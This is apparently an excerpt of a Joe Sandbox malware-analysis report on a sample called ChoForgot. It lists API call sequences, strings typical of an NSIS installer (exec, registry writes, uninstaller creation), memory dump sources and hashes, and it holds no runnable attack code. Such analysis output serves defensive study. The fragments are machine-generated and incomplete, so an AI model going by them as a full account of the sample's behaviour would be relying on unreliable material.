• GetDlgItem.USER32(?,000003E8), ref: 004042AA
• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
• LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
• SetCursor.USER32(00000000), ref: 004042FE
• ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
• LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
• SetCursor.USER32(00000000), ref: 00404322
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
Similarity
• API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
• String ID: F$N$open
• API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                        • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                        • String ID: F
                                                                                                                                                                                                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                        • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                        • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                        • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                        • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                        • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                        • String ID: f
                                                                                                                                                                                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00045A00,00000064,0010F561), ref: 00403295
                                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                        APIs
